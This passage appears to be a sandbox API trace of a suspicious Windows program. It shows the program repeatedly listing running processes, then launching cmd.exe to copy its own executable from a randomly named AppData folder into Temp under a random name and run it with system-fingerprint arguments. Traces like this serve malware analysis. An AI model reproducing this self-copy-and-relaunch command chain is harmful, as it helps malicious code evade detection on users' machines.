szExeFile="taskhost.exe")) returned 1 [0106.955] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0106.956] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0106.957] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0106.958] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.959] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0106.960] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0106.962] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, 
dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0106.984] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0106.985] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0106.986] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0106.987] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0106.988] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0106.989] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0106.990] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 
th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0106.991] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0106.992] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0106.993] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0106.995] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0106.996] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0106.997] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0106.998] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, 
th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0106.999] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0107.000] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0107.001] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0107.002] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0107.002] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.003] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0107.004] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0107.005] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0107.006] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xaec, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0107.007] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0107.008] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0107.008] CloseHandle (hObject=0xf8) returned 1 [0107.009] GetTickCount () returned 0x25994 [0107.009] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc10 | out: lpPerformanceCount=0x12fc10*=16379780674) returned 1 [0107.009] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbec, cbMultiByte=1, lpWideCharStr=0x12ebd4, cchWideChar=2047 | out: lpWideCharStr="F") returned 1 [0107.009] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbec, cbMultiByte=1, lpWideCharStr=0x12ebd4, cchWideChar=2047 | out: lpWideCharStr="8") returned 1 [0107.009] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbec, cbMultiByte=1, 
lpWideCharStr=0x12ebd4, cchWideChar=2047 | out: lpWideCharStr="a") returned 1 [0107.009] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbec, cbMultiByte=1, lpWideCharStr=0x12ebd4, cchWideChar=2047 | out: lpWideCharStr="3") returned 1 [0107.009] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbec, cbMultiByte=1, lpWideCharStr=0x12ebd4, cchWideChar=2047 | out: lpWideCharStr="i") returned 1 [0107.009] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbec, cbMultiByte=1, lpWideCharStr=0x12ebd4, cchWideChar=2047 | out: lpWideCharStr="w") returned 1 [0107.009] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbec, cbMultiByte=1, lpWideCharStr=0x12ebd4, cchWideChar=2047 | out: lpWideCharStr="A") returned 1 [0107.009] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbec, cbMultiByte=1, lpWideCharStr=0x12ebd4, cchWideChar=2047 | out: lpWideCharStr="6") returned 1 [0107.009] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe", lpszShortPath=0x128b71c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe") returned 0x36 [0107.009] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]", cchLength=0x38 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]") returned 0x38 [0107.009] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0107.009] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\", lpszShortPath=0x128b71c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\") returned 0x24 [0107.009] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]", cchLength=0x63 | out: lpsz="TYPE 
\"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]") returned 0x63 [0107.009] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0107.009] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe\" [PARAMS]", cchLength=0xb1 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"C:\\USERS\\EEBSYM5\\APPDATA\\LOCAL\\TEMP\\F8A3IWA6.EXE\" && \"C:\\USERS\\EEBSYM5\\APPDATA\\LOCAL\\TEMP\\F8A3IWA6.EXE\" [PARAMS]") returned 0xb1 [0107.009] CharUpperBuffW (in: lpsz="[PARAMS]", cchLength=0x8 | out: lpsz="[PARAMS]") returned 0x8 [0107.010] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"WIN_6.1_32|ADMIN_YES|INT_4\" \"60000\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb2c*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb1c | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" 
\"7l6OWDI9Fmrsoy1O\" \"WIN_6.1_32|ADMIN_YES|INT_4\" \"60000\"", lpProcessInformation=0x12fb1c*(hProcess=0xf0, hThread=0xf8, dwProcessId=0xc8c, dwThreadId=0xc90)) returned 1 [0107.015] CloseHandle (hObject=0xf0) returned 1 [0107.015] CloseHandle (hObject=0xf8) returned 1 [0107.015] Sleep (dwMilliseconds=0xfa) [0107.294] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xf4 [0107.299] Process32FirstW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0107.299] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0107.300] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0107.301] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0107.301] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0107.302] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, 
th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0107.303] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0107.303] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0107.304] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0107.305] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0107.305] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.306] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.307] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, 
th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.307] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.308] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.309] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0107.309] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.310] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.312] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0107.313] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, 
th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.314] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0107.315] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0107.316] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0107.317] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0107.318] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.319] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0107.321] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 
th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0107.322] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0107.323] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0107.324] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0107.325] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0107.327] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0107.328] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0107.329] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: 